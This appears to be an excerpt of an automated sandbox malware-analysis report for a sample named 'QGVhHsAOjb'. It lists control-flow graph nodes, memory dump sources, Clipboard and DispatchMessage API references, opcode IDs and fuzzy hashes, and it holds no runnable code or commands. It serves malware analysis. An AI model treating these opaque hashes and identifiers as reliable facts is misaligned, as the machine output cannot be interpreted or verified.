                                                                                                                                            control_flow_graph 1020 305aebb-305aec0 1021 305af33-305af40 1020->1021 1022 305aec2 1020->1022 1026 305af53-305af5e 1021->1026 1027 305af42-305af4d 1021->1027 1023 305aec4-305aec8 1022->1023 1024 305aec9-305aed9 1022->1024 1023->1024 1029 305aedf-305aee3 1024->1029 1030 305aedb-305aedd 1024->1030 1035 305af64-305afc1 1026->1035 1036 305b02f-305b051 1026->1036 1027->1026 1034 305afd6-305b028 1027->1034 1033 305aee9-305aeea 1029->1033 1030->1033 1034->1036 1043 305afca-305afd3 1035->1043 1046 305b053-305b074 call 3057c88 1036->1046 1047 305b0ca-305b0e2 call 305b060 1036->1047 1060 305b085-305b093 1046->1060 1061 305b076-305b083 1046->1061 1058 305b0e8-305b0ed 1047->1058 1059 305b1ab 1047->1059 1058->1059 1062 305b0f3-305b112 1058->1062 1064 305b1b0-305b1ba 1059->1064 1067 305b095-305b09f 1060->1067 1068 305b0a1 1060->1068 1070 305b0a3-305b0a6 1061->1070 1072 305b114-305b11c 1062->1072 1073 305b15b-305b16f 1062->1073 1075 305b1c1 1064->1075 1076 305b1bc-305b1c0 1064->1076 1067->1070 1068->1070 1072->1059 1077 305b122-305b125 1072->1077 1084 305b171-305b177 1073->1084 1085 305b19e-305b1a8 1073->1085 1080 305b1c3-305b1ef 1075->1080 1081 305b23a-305b250 1075->1081 1076->1075 1077->1059 1078 305b12b-305b14a 1077->1078 1078->1059 1108 305b14c-305b152 1078->1108 1082 305b1f7-305b1ff 1080->1082 1083 305b1f1-305b1f4 1080->1083 1104 305b494 1081->1104 1123 305b256-305b259 1081->1123 1086 305b267-305b26e 1082->1086 1087 305b201-305b207 1082->1087 1083->1082 1084->1064 1090 305b179-305b196 1084->1090 1091 305b274-305b27b 1086->1091 1092 305b373-305b37c 1086->1092 1087->1086 1093 305b209-305b20f 1087->1093 1090->1085 1096 305b281-305b289 1091->1096 1097 305b32a-305b330 1091->1097 1094 305b386-305b389 1092->1094 1095 305b37e-305b384 1092->1095 1098 305b215-305b222 1093->1098 1099 305b499-305b4cf 1093->1099 1094->1104 1105 305b38f-305b39d 1094->1105 1095->1094 1103 305b3a0-305b3a4 1095->1103 1096->1104 1106 305b28f-305b298 1096->1106 1097->1099 1109 305b336-305b340 1097->1109 1098->1099 1107 305b228-305b239 1098->1107 1132 305b4d1-305b4dc 1099->1132 1133 305b4de-305b4e2 1099->1133 1112 305b427-305b42b 1103->1112 1113 305b3aa-305b3b3 1103->1113 1104->1099 1105->1103 1106->1099 1110 305b29e-305b2d1 1106->1110 1107->1081 1108->1064 1111 305b154-305b158 1108->1111 1109->1099 1115 305b346-305b362 1109->1115 1153 305b2d3 1110->1153 1154 305b31b-305b328 1110->1154 1111->1073 1119 305b42d-305b436 1112->1119 1120 305b48a-305b491 1112->1120 1113->1112 1122 305b3b5-305b3bb 1113->1122 1144 305b36a-305b36d 1115->1144 1119->1104 1126 305b438-305b43f 1119->1126 1122->1099 1127 305b3c1-305b3cb 1122->1127 1123->1104 1124 305b25f-305b265 1123->1124 1124->1086 1124->1087 1126->1120 1130 305b441 1126->1130 1127->1099 1131 305b3d1-305b3de 1127->1131 1135 305b444-305b44c 1130->1135 1131->1099 1136 305b3e4-305b40f 1131->1136 1132->1133 1138 305b4f4 1133->1138 1139 305b4e4-305b4f2 1133->1139 1141 305b480-305b483 1135->1141 1142 305b44e-305b45a 1135->1142 1136->1099 1170 305b415-305b41d 1136->1170 1140 305b4f6-305b4f8 1138->1140 1139->1140 1145 305b4fe-305b506 1140->1145 1146 305b4fa-305b4fc 1140->1146 1141->1104 1147 305b485-305b488 1141->1147 1142->1099 1149 305b45c-305b478 1142->1149 1144->1092 1144->1104 1151 305b529-305b52b 1145->1151 1152 305b508-305b51a 1145->1152 1146->1145 1147->1120 1147->1135 1149->1141 1156 305b52d-305b53a call 305abe0 1151->1156 1157 305b559-305b56a 1151->1157 1152->1151 1166 305b51c-305b527 1152->1166 1158 305b2d6-305b2dc 1153->1158 1154->1144 1156->1157 1171 305b53c-305b54b 1156->1171 1158->1099 1163 305b2e2-305b303 1158->1163 1163->1104 1177 305b309-305b30d 1163->1177 1166->1151 1170->1104 1172 305b41f-305b425 1170->1172 1171->1157 1176 305b54d-305b557 1171->1176 1172->1112 1172->1122 1176->1157 1177->1104 1178 305b313-305b319 1177->1178 1178->1154 1178->1158
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q
                                                                                                                                            • API String ID: 0-1946778100
                                                                                                                                            • Opcode ID: 872d4f59e740162a8432ddc946d77157d6c58021c736762d0f0061e637da7dc1
                                                                                                                                            • Instruction ID: fc3ba1e619b8945f24f526ea9ca106eb68347f0e34cd8eafd6b7d2981cdff756
                                                                                                                                            • Opcode Fuzzy Hash: 872d4f59e740162a8432ddc946d77157d6c58021c736762d0f0061e637da7dc1
                                                                                                                                            • Instruction Fuzzy Hash: AF619031B012059FCB58DF68D8846AFBBF6BF88610F148569E916DB3A4CB31AC51CB94

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1420 3059c30-3059c51 1463 3059c53 call 3059a10 1420->1463 1464 3059c53 call 3059c30 1420->1464 1422 3059c59-3059c60 1423 3059c62-3059c67 1422->1423 1424 3059c6c-3059c8c 1422->1424 1425 3059d35-3059d3c 1423->1425 1427 3059cc7-3059cc9 1424->1427 1428 3059c8e-3059c90 1424->1428 1429 3059d30 1427->1429 1430 3059ccb-3059cd1 1427->1430 1431 3059c92-3059c97 1428->1431 1432 3059c9f-3059ca6 1428->1432 1429->1425 1430->1429 1433 3059cd3-3059cee 1430->1433 1431->1432 1434 3059cac-3059cc5 1432->1434 1435 3059d3f-3059d4a 1432->1435 1441 3059d25-3059d27 1433->1441 1442 3059cf0-3059cf2 1433->1442 1434->1425 1439 3059d51-3059d52 1435->1439 1440 3059d4c-3059d50 1435->1440 1443 3059d54 1439->1443 1444 3059d59-3059d6b call 3059620 1439->1444 1440->1439 1441->1429 1447 3059d29-3059d2e 1441->1447 1445 3059cf4-3059cf9 1442->1445 1446 3059d01-3059d08 1442->1446 1443->1444 1451 3059d6d-3059d77 1444->1451 1452 3059d79-3059d82 call 3059620 1444->1452 1445->1446 1446->1435 1449 3059d0a-3059d23 1446->1449 1447->1425 1449->1425 1451->1452 1457 3059d84-3059d8e 1452->1457 1458 3059d90-3059d99 1452->1458 1457->1458 1460 3059da4-3059dcd 1458->1460 1463->1422 1464->1422
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4'^q$4'^q
                                                                                                                                            • API String ID: 0-2697143702
                                                                                                                                            • Opcode ID: d73b284a8e036c00e8190922c4567c3dbe09ff9503b9e14bffe50028a073a417
                                                                                                                                            • Instruction ID: d3a6f3c87aa59e99f01fb965a7ecd6b482d44ee0339f8a66a8b6bc527f780633
                                                                                                                                            • Opcode Fuzzy Hash: d73b284a8e036c00e8190922c4567c3dbe09ff9503b9e14bffe50028a073a417
                                                                                                                                            • Instruction Fuzzy Hash: 81518D347012449FDB15DB69C844B6FBBEAEB89350F188866FD09CB255EB71CC41C7A1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Xbq$Xbq
                                                                                                                                            • API String ID: 0-1243427068
                                                                                                                                            • Opcode ID: 146e2d63ec6888c1a3e1d1332acf872b18aaf2e59965d12a6d97b82b4b7a3f4f
                                                                                                                                            • Instruction ID: 62b90b8c068c447f419048deae57dbcafd849668a48ce58ae62630ebd65206f5
                                                                                                                                            • Opcode Fuzzy Hash: 146e2d63ec6888c1a3e1d1332acf872b18aaf2e59965d12a6d97b82b4b7a3f4f
                                                                                                                                            • Instruction Fuzzy Hash: 2D3126397062248BDF58867AA59437FEAFAABC4280F0844B9FC06C7394DB75CC448771
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $^q$$^q
                                                                                                                                            • API String ID: 0-355816377
                                                                                                                                            • Opcode ID: 19452539e15438350600ba4d849de6827ff0facdc567fda64d557908a135d39c
                                                                                                                                            • Instruction ID: 85994f3d6c755fa5411d299e037b1404a9baaf56ba35a6223db484e94e8c194d
                                                                                                                                            • Opcode Fuzzy Hash: 19452539e15438350600ba4d849de6827ff0facdc567fda64d557908a135d39c
                                                                                                                                            • Instruction Fuzzy Hash: 0C31C6303051558FCB69DB39D89462F7BABBB8D710B188896FC56CB292EB28CC81C755
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: e7eb3bc56f4110cccd002c54cb37664d12666079a2b6e6dc6038fe9f072c3d09
                                                                                                                                            • Instruction ID: d69382baae94107ccccc1e2538a0516bbadcbe25128ea5e64934e8ae8345a416
                                                                                                                                            • Opcode Fuzzy Hash: e7eb3bc56f4110cccd002c54cb37664d12666079a2b6e6dc6038fe9f072c3d09
                                                                                                                                            • Instruction Fuzzy Hash: 2F52CF78A01219CFCB64DF68F998A9DBBB2FF88301F1085A5E809A7354DB346D85CF51
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: 485a64c4785096744d30d71e7f598dcaf0300d2c9fdbb62ccf94756e8a901651
                                                                                                                                            • Instruction ID: 000d64b45dd7fc2818fa8cb9a0eef883fc815c992a5800c936f1985de8d4f405
                                                                                                                                            • Opcode Fuzzy Hash: 485a64c4785096744d30d71e7f598dcaf0300d2c9fdbb62ccf94756e8a901651
                                                                                                                                            • Instruction Fuzzy Hash: 2352BF78A01219CFCB64DF68F998A9DBBB2FF88301F1085A5E809A7354DB346D85CF51
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4156954254.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_7550000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: 6edfa4a034a0d90ae0cbdbd0ee48dd32f98ae372a17209131703cd89cb9165a0
                                                                                                                                            • Instruction ID: 2d8065b0a3d08586eb2f6aeff275a9f3997a5cfa469e3f4269f9608064e634ef
                                                                                                                                            • Opcode Fuzzy Hash: 6edfa4a034a0d90ae0cbdbd0ee48dd32f98ae372a17209131703cd89cb9165a0
                                                                                                                                            • Instruction Fuzzy Hash: 893131B0911209EFDB10CFA9C894BCEBBF1BF48304F20845AE804AB294CBB46945CF95
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4156954254.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_7550000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: b21f9de230f8526bb2a47b6bfc3412a9f5e6f92933ec90afd89afada70ae631e
                                                                                                                                            • Instruction ID: 0ab50b450f050ba9d79d42b6fa9715f96960b85cc65e5d0485458520bfa30b20
                                                                                                                                            • Opcode Fuzzy Hash: b21f9de230f8526bb2a47b6bfc3412a9f5e6f92933ec90afd89afada70ae631e
                                                                                                                                            • Instruction Fuzzy Hash: 043122B090164DEFDB10CF99C994BCEBFF4BF48304F24805AE408AB294DBB46845CB95
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4156954254.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_7550000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: a818d930fac648504dfc5a1ae8cbb5e9a4a0fae2aab6d5c07483abefa1942404
                                                                                                                                            • Instruction ID: c20b6b4c7e5b51c6512c4503cda996fcbbf59185f6ac865cee9fe5a7e1651c01
                                                                                                                                            • Opcode Fuzzy Hash: a818d930fac648504dfc5a1ae8cbb5e9a4a0fae2aab6d5c07483abefa1942404
                                                                                                                                            • Instruction Fuzzy Hash: 7F11F2B1D0475ACFCB20CFAAD448ACEFBF4BB48324F20855AE468A7250D334A544CFA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4156954254.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_7550000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: 9b96287d2d53b7a1bda507c9eaf093e0773c11410f67061128aaea4f0ea21d1a
                                                                                                                                            • Instruction ID: 2c1c7473e52e44d5c98321b642102d19218b1282dad658d2842db511af892d67
                                                                                                                                            • Opcode Fuzzy Hash: 9b96287d2d53b7a1bda507c9eaf093e0773c11410f67061128aaea4f0ea21d1a
                                                                                                                                            • Instruction Fuzzy Hash: F511D0B5C04659CFCB20DF9AD544BDEFBF4EB48324F20842AD858A7250D378A544CFA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1d4101c84e61d6eb30b44bd595d1bf81be994be7a5ea6c821b607f1d53667bae
                                                                                                                                            • Instruction ID: 2db917b0e4370f3288d3f1b13896bcca04da408a07c0ce306f9790fee42365d8
                                                                                                                                            • Opcode Fuzzy Hash: 1d4101c84e61d6eb30b44bd595d1bf81be994be7a5ea6c821b607f1d53667bae
                                                                                                                                            • Instruction Fuzzy Hash: C612A734021246AFA7683B20E6AC56A7B71FB2F363B44BD05F54BC0448DB7154EA8B76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7fffa9e033a295463796598358cfcddfe21c397c7dcae61be6f9dcc37d6b1f52
                                                                                                                                            • Instruction ID: eee3c5990a052d91b02612ef662f92be1581abf20291468786654ad8caa44103
                                                                                                                                            • Opcode Fuzzy Hash: 7fffa9e033a295463796598358cfcddfe21c397c7dcae61be6f9dcc37d6b1f52
                                                                                                                                            • Instruction Fuzzy Hash: 68129734021246AFA7683B20E6AC56A7B71FB2F363B44BD05F54BC0448DB7154EA8F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b51ef5c196ff552aeaf9af8492f6014ba32bb509dffe9d28a9327e7f7fd79b00
                                                                                                                                            • Instruction ID: c6a55307ef711e9aac7c6914411dfbd40a7ee79b5c7ea843f2a3a4f7bfe4d533
                                                                                                                                            • Opcode Fuzzy Hash: b51ef5c196ff552aeaf9af8492f6014ba32bb509dffe9d28a9327e7f7fd79b00
                                                                                                                                            • Instruction Fuzzy Hash: B091F331902645DFC715CF28D8805ABFBBAEF85320B19C666ED5897356D331E851CBE0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d8c2c18b0d44e971095b903b1b7580e4204e08a72e33fdac14c59009df078b9
                                                                                                                                            • Instruction ID: 6ca1cda8fd8568f0775521b41b184e43726dae1142cb72b933a814f9d5e60f0c
                                                                                                                                            • Opcode Fuzzy Hash: 8d8c2c18b0d44e971095b903b1b7580e4204e08a72e33fdac14c59009df078b9
                                                                                                                                            • Instruction Fuzzy Hash: 4C7138347026058FCB64DF68C884AAF7BE9AF99640B1984A9FC06DB371DB70DC41CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4aa02a2229cedc83491ff693f7384b9898c8913af2d6b40561a1e2fce4e53cc0
                                                                                                                                            • Instruction ID: bec15efc681f810cba4070f6e629d13de7d3c56c607c4236ac391ae8f9e95218
                                                                                                                                            • Opcode Fuzzy Hash: 4aa02a2229cedc83491ff693f7384b9898c8913af2d6b40561a1e2fce4e53cc0
                                                                                                                                            • Instruction Fuzzy Hash: 48518174E01218DFDB58DFA9D58499DFBF2BF89300F24816AE819AB365DB30A901CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3dd7a798cbb1f80e99106e397aadcdfa52bd86493de9dd13fb2e41a84872f899
                                                                                                                                            • Instruction ID: 572c60749f68cfb41b58067dce9b92201ee68bebe887eb7670d946b44206ec58
                                                                                                                                            • Opcode Fuzzy Hash: 3dd7a798cbb1f80e99106e397aadcdfa52bd86493de9dd13fb2e41a84872f899
                                                                                                                                            • Instruction Fuzzy Hash: C4519878E01208DFCB48DFAAD58499DBBF2FF89314B209569E805AB324DB359D41CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 02be985e1794082b82c4d6698f2756926f86d16d68a67136f1becaa572f1ea64
                                                                                                                                            • Instruction ID: b0aa965de7b797cf232af7cb5459e27f4902d099b24a051698bd19ebb4c3afcf
                                                                                                                                            • Opcode Fuzzy Hash: 02be985e1794082b82c4d6698f2756926f86d16d68a67136f1becaa572f1ea64
                                                                                                                                            • Instruction Fuzzy Hash: 28418C31B05249DFCF16CFA8C848A9EBBF2AF89315F048655FD15AB291D330E954CB64
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3453d925b26e1a2d4f7a89e4a7666cdc9caf6ecb2755325b3dddc97eb5561b9
                                                                                                                                            • Instruction ID: 01cacb6a1e21b1c6098461e3c3fd928b85b9e78786f33999b43656c5830ca9a9
                                                                                                                                            • Opcode Fuzzy Hash: a3453d925b26e1a2d4f7a89e4a7666cdc9caf6ecb2755325b3dddc97eb5561b9
                                                                                                                                            • Instruction Fuzzy Hash: A441E131A04258DFCB25CF64C804B6FBBF6EB44300F0894AAF9198B252DB79DD55DBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d0980a098d645e23ed6afde72c394fb591d2ac6d7d958d1ec03d6cfe5077a51b
                                                                                                                                            • Instruction ID: 78a6106b6e1f66cb3809a4b73d11c25c419f5759233e73d601d6d485ecb3e123
                                                                                                                                            • Opcode Fuzzy Hash: d0980a098d645e23ed6afde72c394fb591d2ac6d7d958d1ec03d6cfe5077a51b
                                                                                                                                            • Instruction Fuzzy Hash: 66319E35605159AFCB05DF64E858AAF7BA6EB99200F048024FD1A97254CB39C961CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7706f2b9342f1942042d7552881b6e84d0ab2ee147fb7c393e9ac111b57f1304
                                                                                                                                            • Instruction ID: b8516d4acd8945967312eb28b3d14c33a0597c8de2e824699f97dddf65ff5cc9
                                                                                                                                            • Opcode Fuzzy Hash: 7706f2b9342f1942042d7552881b6e84d0ab2ee147fb7c393e9ac111b57f1304
                                                                                                                                            • Instruction Fuzzy Hash: 452136313052404BCB64A735845863F66DAEFC964A70CC4A9FD06CBB68EB25C843CB92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1f1161a94dc453300ba995e8fef1df893211ea12611d2a3bcf2a91cd4768734a
                                                                                                                                            • Instruction ID: 14f1f287bc9f5777dbffd78d44d330131914197e4bf6528ad558c86739b4e3b7
                                                                                                                                            • Opcode Fuzzy Hash: 1f1161a94dc453300ba995e8fef1df893211ea12611d2a3bcf2a91cd4768734a
                                                                                                                                            • Instruction Fuzzy Hash: 6641B074E05319DFDB64DF64D858BAEBBB2AF49305F1084AAE80EA7250DB345A81CF11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a4d2feade99a7a312f21dd7df4aa261f38a375913c3b6be655a8b9e9038c7309
                                                                                                                                            • Instruction ID: 3ad73876a35add07891a7495de4d6c255a32c7871d48e9793aebe506f2161830
                                                                                                                                            • Opcode Fuzzy Hash: a4d2feade99a7a312f21dd7df4aa261f38a375913c3b6be655a8b9e9038c7309
                                                                                                                                            • Instruction Fuzzy Hash: A521C1313012004BDB649629C45873F66DBAFC874AF18C479ED06CBBA8EB65C8939B91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c0982b2a23d4fd8893f88941c5290b4005404f551f8f6705fb46924fb99bfc3f
                                                                                                                                            • Instruction ID: edd961e39c74440f7eeb3abd2ab0fe641451e4b41bee04bcf30200db33c177cf
                                                                                                                                            • Opcode Fuzzy Hash: c0982b2a23d4fd8893f88941c5290b4005404f551f8f6705fb46924fb99bfc3f
                                                                                                                                            • Instruction Fuzzy Hash: C2316774D0620D9FCB14EFA8D8446EEBBF9FF49310F04456AE808B7264EB305995CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a05156cbb73056a3a08a50e992bfc02147b39eb99c7fa62f30b8f15bf6aecb97
                                                                                                                                            • Instruction ID: 3f9e66c504025fb9184d510535d2b49039d9dee9ff0739fa874ef677bac7bb7c
                                                                                                                                            • Opcode Fuzzy Hash: a05156cbb73056a3a08a50e992bfc02147b39eb99c7fa62f30b8f15bf6aecb97
                                                                                                                                            • Instruction Fuzzy Hash: 2621223530A6259FC7299B29D45852FBBE2EFE93517088469E80ADB398CF35CC02C794
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
